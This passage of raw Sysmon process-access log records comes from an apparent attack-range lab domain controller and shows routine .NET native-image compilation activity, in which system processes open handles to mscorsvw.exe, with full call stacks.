svc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.500{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9118-6005-9801-00000000A301}864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.500{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9118-6005-9801-00000000A301}864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.500{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9118-6005-9801-00000000A301}864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.391{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9118-6005-9701-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.375{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9118-6005-9701-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.375{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9118-6005-9701-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.063{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9118-6005-9601-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.063{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9118-6005-9601-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.063{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9118-6005-9601-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.797{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9E01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.781{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9E01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.781{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9E01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9D01-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.750{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9D01-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.750{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9D01-00000000A301}5008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9C01-00000000A301}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.672{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9C01-00000000A301}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.672{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9C01-00000000A301}3124C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9B01-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.078{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9B01-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.078{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9119-6005-9B01-00000000A301}3904C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.047{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9A01-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.047{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9A01-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 